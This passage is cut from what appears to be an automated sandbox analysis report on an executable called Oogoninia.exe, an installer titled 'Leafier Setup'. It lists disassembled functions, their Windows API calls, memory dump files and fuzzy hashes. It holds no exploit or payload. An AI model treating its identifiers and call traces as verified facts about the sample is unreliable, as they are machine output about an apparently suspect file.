                                                                                                                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C9A
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403D40
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403D61
                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403D73
                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403D8E
                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DA4
                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403DAB
                                                                                                                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DC3
                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403DD6
                                                                                                                                                                                    • lstrlenA.KERNEL32(0079E540,?,0079E540,Leafier Setup), ref: 00403DFF
                                                                                                                                                                                    • SetWindowTextA.USER32(?,0079E540), ref: 00403E0E
                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00403F42
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                    • String ID: @y$Leafier Setup
                                                                                                                                                                                    • API String ID: 184305955-2170679728
                                                                                                                                                                                    • Opcode ID: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
                                                                                                                                                                                    • Instruction ID: 1a58b870ca21ce47ba752d56327be38b30dd2316994c96cb4837d6e7696a1104
                                                                                                                                                                                    • Opcode Fuzzy Hash: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
                                                                                                                                                                                    • Instruction Fuzzy Hash: 81C1AF71904201ABEB216F61ED89E2A7EBCEB4570AF40853EF601B11F1C73DA941DB1E
                                                                                                                                                                                    Function 004040CE Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404159
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,000003E8), ref: 0040416D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040418B
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 0040419C
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041AB
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041BA
                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 004041BD
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004041CC
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004041E1
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404243
                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00404246
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404271
                                                                                                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042B1
                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 004042C0
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042C9
                                                                                                                                                                                    • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 004042DC
                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004042E9
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042EC
                                                                                                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404318
                                                                                                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040432C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                    • String ID: Call$N$open
                                                                                                                                                                                    • API String ID: 3615053054-2563687911
                                                                                                                                                                                    • Opcode ID: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                                                                                                                                                    • Instruction ID: 601bc5fe35b3c5de407f3786c3433e5d67f1b6e9b87549a619d2750a8ed94523
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B61A5B1A40209BFEB109F61CC45F6A7B79FB84705F108026FB05BA2D1C7B8A951CF58
                                                                                                                                                                                    Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                    • DrawTextA.USER32(00000000,Leafier Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                    • String ID: F$Leafier Setup
                                                                                                                                                                                    • API String ID: 941294808-118588945
                                                                                                                                                                                    • Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                                                                                                                                    • Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                                                                                                                                    • Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                                                                                                                                    Function 00405AE9 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405C7C,?,?), ref: 00405AF8
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C7C,?,?), ref: 00405B1C
                                                                                                                                                                                    • GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405B25
                                                                                                                                                                                      • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
                                                                                                                                                                                      • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
                                                                                                                                                                                    • GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405B42
                                                                                                                                                                                    • wsprintfA.USER32 ref: 00405B60
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B9B
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405BAA
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                                                                                                                                    • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405C38
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405C49
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405C50
                                                                                                                                                                                      • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 00405A17
                                                                                                                                                                                      • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                    • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                    • API String ID: 222337774-4148678300
                                                                                                                                                                                    • Opcode ID: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                                                                                                                                                    • Instruction ID: 1eed59494e777df17b5db6228b66ba1829f219dd2eba3e9b173e6ae731b9f24b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 503125B0A08B05ABE6203B615D48F6B3A5CDF45794F14053BFE01F62D2DA7CAC408EAD
                                                                                                                                                                                    Function 0040600B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Oogoninia.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
                                                                                                                                                                                    • CharNextA.USER32(?,?,?,00000000), ref: 00406070
                                                                                                                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\Oogoninia.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
                                                                                                                                                                                    • CharPrevA.USER32(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • *?|<>/":, xrefs: 00406053
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040600C
                                                                                                                                                                                    • "C:\Users\user\Desktop\Oogoninia.exe", xrefs: 00406047
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 589700163-566200678
                                                                                                                                                                                    • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                                                                                    • Instruction ID: 5800177166b7667d3eaf53a22357e4554d28550b3292ec339307e94a63baae70
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5011276184479129FB3296384C00B7B6FD94F567A0F19007BE9C6722C2C67C5C62836D
                                                                                                                                                                                    Function 00403FEC Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EB), ref: 00404009
                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00404025
                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404031
                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 0040403D
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00404050
                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404060
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040407A
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404084
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                    • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                                                                                                    • Instruction ID: c3620b6f473fad47e7a0c0791398936244beda297bc66feae6272bbc27e0e58c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7214FB1904704ABCB319F78DD48B5BBBF8AF41714F048A29EB96B22E0D734E944CB55
                                                                                                                                                                                    Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                                                                                                                                      • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                                                                                                                    • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3730416702-0
                                                                                                                                                                                    • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                                                                                                    • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                                                                                                                                    Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100024EF
